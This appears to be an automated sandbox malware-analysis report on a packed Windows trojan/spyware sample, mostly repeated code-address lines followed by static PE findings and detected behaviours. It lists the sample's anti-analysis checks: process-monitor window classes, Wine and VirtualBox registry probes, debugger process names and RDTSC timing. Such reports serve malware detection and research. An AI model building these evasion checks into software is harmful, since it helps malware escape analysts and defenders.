Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013D9C620_3_013D9C62
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013D9C620_3_013D9C62
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013D9C620_3_013D9C62
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013D9C620_3_013D9C62
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013DD2500_3_013DD250
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013DD2500_3_013DD250
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013DD2500_3_013DD250
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013DD2500_3_013DD250
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013DD2500_3_013DD250
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013DD2500_3_013DD250
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013D5BF00_3_013D5BF0
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013D5BF00_3_013D5BF0
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013D5BF00_3_013D5BF0
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013D5BF00_3_013D5BF0
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013DD4C00_3_013DD4C0
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013DD4C00_3_013DD4C0
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013DD4C00_3_013DD4C0
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013DD4C00_3_013DD4C0
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013DD4C00_3_013DD4C0
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013DD4C00_3_013DD4C0
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013D691D0_3_013D691D
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013D691D0_3_013D691D
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013D691D0_3_013D691D
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013D691D0_3_013D691D
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013DCF7B0_3_013DCF7B
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013DCF7B0_3_013DCF7B
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013DCF7B0_3_013DCF7B
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013DCF7B0_3_013DCF7B
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013DCF7B0_3_013DCF7B
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013DCF7B0_3_013DCF7B
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013E88780_3_013E8878
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013E88780_3_013E8878
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013E88780_3_013E8878
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013E88780_3_013E8878
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013E4A6F0_3_013E4A6F
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013E4A6F0_3_013E4A6F
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013E4A6F0_3_013E4A6F
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013E4A6F0_3_013E4A6F
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013E4A6F0_3_013E4A6F
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013E4A6F0_3_013E4A6F
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013E4A6F0_3_013E4A6F
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013D9C620_3_013D9C62
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013D9C620_3_013D9C62
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013D9C620_3_013D9C62
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013D9C620_3_013D9C62
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013D9C620_3_013D9C62
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013D9C620_3_013D9C62
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013DD2500_3_013DD250
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013DD2500_3_013DD250
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013DD2500_3_013DD250
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013DD2500_3_013DD250
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013DD2500_3_013DD250
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013DD2500_3_013DD250
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013D5BF00_3_013D5BF0
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013D5BF00_3_013D5BF0
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013D5BF00_3_013D5BF0
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013D5BF00_3_013D5BF0
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013DD4C00_3_013DD4C0
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013DD4C00_3_013DD4C0
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013DD4C00_3_013DD4C0
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013DD4C00_3_013DD4C0
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013DD4C00_3_013DD4C0
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013DD4C00_3_013DD4C0
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013D691D0_3_013D691D
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013D691D0_3_013D691D
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013D691D0_3_013D691D
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013D691D0_3_013D691D
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013DCF7B0_3_013DCF7B
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013DCF7B0_3_013DCF7B
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013DCF7B0_3_013DCF7B
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013DCF7B0_3_013DCF7B
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013DCF7B0_3_013DCF7B
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013DCF7B0_3_013DCF7B
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013E88780_3_013E8878
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013E88780_3_013E8878
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013E88780_3_013E8878
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013E88780_3_013E8878
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013E4A6F0_3_013E4A6F
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013E4A6F0_3_013E4A6F
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013E4A6F0_3_013E4A6F
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013E4A6F0_3_013E4A6F
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013E4A6F0_3_013E4A6F
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013E4A6F0_3_013E4A6F
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013E4A6F0_3_013E4A6F
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013D9C620_3_013D9C62
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013D9C620_3_013D9C62
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013D9C620_3_013D9C62
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013D9C620_3_013D9C62
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013D9C620_3_013D9C62
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013D9C620_3_013D9C62
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013DD2500_3_013DD250
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013DD2500_3_013DD250
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013DD2500_3_013DD250
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013DD2500_3_013DD250
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013DD2500_3_013DD250
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013DD2500_3_013DD250
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013D5BF00_3_013D5BF0
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013D5BF00_3_013D5BF0
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013D5BF00_3_013D5BF0
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013D5BF00_3_013D5BF0
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013DD4C00_3_013DD4C0
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013DD4C00_3_013DD4C0
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013DD4C00_3_013DD4C0
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013DD4C00_3_013DD4C0
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013DD4C00_3_013DD4C0
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013DD4C00_3_013DD4C0
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013DCF7B0_3_013DCF7B
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013DCF7B0_3_013DCF7B
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013DCF7B0_3_013DCF7B
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013DCF7B0_3_013DCF7B
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013DCF7B0_3_013DCF7B
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013DCF7B0_3_013DCF7B
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013E88780_3_013E8878
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013E88780_3_013E8878
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013E88780_3_013E8878
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013E88780_3_013E8878
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013E4A6F0_3_013E4A6F
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013E4A6F0_3_013E4A6F
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013E4A6F0_3_013E4A6F
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013E4A6F0_3_013E4A6F
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013E4A6F0_3_013E4A6F
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013E4A6F0_3_013E4A6F
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013E4A6F0_3_013E4A6F
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013D9C620_3_013D9C62
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013D9C620_3_013D9C62
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013D9C620_3_013D9C62
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013D9C620_3_013D9C62
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013D9C620_3_013D9C62
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013D9C620_3_013D9C62
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013DD2500_3_013DD250
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013DD2500_3_013DD250
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013DD2500_3_013DD250
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013DD2500_3_013DD250
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013DD2500_3_013DD250
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013DD2500_3_013DD250
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013E88780_3_013E8878
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013E88780_3_013E8878
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013E88780_3_013E8878
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013E88780_3_013E8878
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013E88A80_3_013E88A8
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013E88A80_3_013E88A8
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013E88A80_3_013E88A8
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013E88A80_3_013E88A8
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013DD4C00_3_013DD4C0
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013DD4C00_3_013DD4C0
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013DD4C00_3_013DD4C0
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013DD4C00_3_013DD4C0
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013DD4C00_3_013DD4C0
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013DD4C00_3_013DD4C0
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013DCF7B0_3_013DCF7B
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013DCF7B0_3_013DCF7B
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013DCF7B0_3_013DCF7B
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013DCF7B0_3_013DCF7B
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013DCF7B0_3_013DCF7B
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013DCF7B0_3_013DCF7B
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013E88780_3_013E8878
Source: S0O8qbVwLk.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: S0O8qbVwLk.exeStatic PE information: Section: eqznuyix ZLIB complexity 0.9943493728681069
Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/0@27/2
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeMutant created: \Sessions\1\BaseNamedObjects\My_mutex
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: S0O8qbVwLk.exeReversingLabs: Detection: 65%
Source: S0O8qbVwLk.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: S0O8qbVwLk.exeString found in binary or memory: Unable to complete request for channel-process-startup
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeSection loaded: windowscodecs.dllJump to behavior
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeSection loaded: kernel.appcore.dllJump to behavior
Source: S0O8qbVwLk.exeStatic file information: File size 4453888 > 1048576
Source: S0O8qbVwLk.exeStatic PE information: Raw size of is bigger than: 0x100000 < 0x283e00
Source: S0O8qbVwLk.exeStatic PE information: Raw size of eqznuyix is bigger than: 0x100000 < 0x1b7c00

Data Obfuscation

barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeUnpacked PE file: 0.2.S0O8qbVwLk.exe.770000.0.unpack :EW;.rsrc:W;.idata :W; :EW;eqznuyix:EW;ewsdhmii:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;eqznuyix:EW;ewsdhmii:EW;.taggant:EW;
Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
Source: S0O8qbVwLk.exeStatic PE information: real checksum: 0x44d17a should be: 0x446e74
Source: S0O8qbVwLk.exeStatic PE information: section name:
Source: S0O8qbVwLk.exeStatic PE information: section name: .idata
Source: S0O8qbVwLk.exeStatic PE information: section name:
Source: S0O8qbVwLk.exeStatic PE information: section name: eqznuyix
Source: S0O8qbVwLk.exeStatic PE information: section name: ewsdhmii
Source: S0O8qbVwLk.exeStatic PE information: section name: .taggant
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013E2E40 push eax; iretd 0_3_013E2E41
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013E2E40 push eax; iretd 0_3_013E2E41
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013E2E40 push eax; iretd 0_3_013E2E41
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013E2E40 push eax; iretd 0_3_013E2E41
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013E2E40 push eax; iretd 0_3_013E2E41
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013E2E40 push eax; iretd 0_3_013E2E41
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013E2E40 push eax; iretd 0_3_013E2E41
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013E2E40 push eax; iretd 0_3_013E2E41
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013E2E40 push eax; iretd 0_3_013E2E41
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013E2E40 push eax; iretd 0_3_013E2E41
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013E2E40 push eax; iretd 0_3_013E2E41
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013E2E40 push eax; iretd 0_3_013E2E41
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013E2E40 push eax; iretd 0_3_013E2E41
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013E2E40 push eax; iretd 0_3_013E2E41
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013E2E40 push eax; iretd 0_3_013E2E41
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013E2E40 push eax; iretd 0_3_013E2E41
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013E2E40 push eax; iretd 0_3_013E2E41
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013E2E40 push eax; iretd 0_3_013E2E41
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013E2E40 push eax; iretd 0_3_013E2E41
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013E2E40 push eax; iretd 0_3_013E2E41
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013E2E40 push eax; iretd 0_3_013E2E41
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013E2E40 push eax; iretd 0_3_013E2E41
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013E2E40 push eax; iretd 0_3_013E2E41
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013E2E40 push eax; iretd 0_3_013E2E41
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013E2E40 push eax; iretd 0_3_013E2E41
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013E2E40 push eax; iretd 0_3_013E2E41
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013E2E40 push eax; iretd 0_3_013E2E41
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013E2E40 push eax; iretd 0_3_013E2E41
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013E2E40 push eax; iretd 0_3_013E2E41
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeCode function: 0_3_013E2E40 push eax; iretd 0_3_013E2E41
Source: S0O8qbVwLk.exeStatic PE information: section name: eqznuyix entropy: 7.95498516764781

Boot Survival

barindex
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeWindow searched: window name: FilemonClassJump to behavior
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeWindow searched: window name: RegmonClassJump to behavior
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeWindow searched: window name: FilemonClassJump to behavior
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeWindow searched: window name: RegmonclassJump to behavior
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeWindow searched: window name: FilemonclassJump to behavior
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeWindow searched: window name: RegmonclassJump to behavior

Malware Analysis System Evasion

barindex
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: S0O8qbVwLk.exe, 00000000.00000003.2308214914.0000000006F5F000.00000004.00001000.00020000.00000000.sdmp, S0O8qbVwLk.exe, 00000000.00000002.2951198733.0000000000C20000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: PROCMON.EXE
Source: S0O8qbVwLk.exe, 00000000.00000003.2308214914.0000000006F5F000.00000004.00001000.00020000.00000000.sdmp, S0O8qbVwLk.exe, 00000000.00000002.2951198733.0000000000C20000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: X64DBG.EXE
Source: S0O8qbVwLk.exe, 00000000.00000003.2308214914.0000000006F5F000.00000004.00001000.00020000.00000000.sdmp, S0O8qbVwLk.exe, 00000000.00000002.2951198733.0000000000C20000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: WINDBG.EXE
Source: S0O8qbVwLk.exe, 00000000.00000002.2951198733.0000000000C20000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: SYSINTERNALSNUM_PROCESSORNUM_RAMNAMEALLFREEDRIVERSNUM_DISPLAYSRESOLUTION_XRESOLUTION_Y\*RECENT_FILESPROCESSESUPTIME_MINUTESC:\WINDOWS\SYSTEM32\VBOX*.DLL01VBOX_FIRSTSYSTEM\CONTROLSET001\SERVICES\VBOXSFVBOX_SECONDC:\USERS\PUBLIC\PUBLIC_CHECKWINDBG.EXEDBGWIRESHARK.EXEPROCMON.EXEX64DBG.EXEIDA.EXEDBG_SECDBG_THIRDYADROINSTALLED_APPSSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALLSOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL%D%S\%SDISPLAYNAMEAPP_NAMEINDEXCREATETOOLHELP32SNAPSHOT FAILED.
Source: S0O8qbVwLk.exe, 00000000.00000003.2308214914.0000000006F5F000.00000004.00001000.00020000.00000000.sdmp, S0O8qbVwLk.exe, 00000000.00000002.2951198733.0000000000C20000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: WIRESHARK.EXE
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\S0O8qbVwLk.exeRDTSC instruction interceptor: First address: D8DC1B second address: D8DC1F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
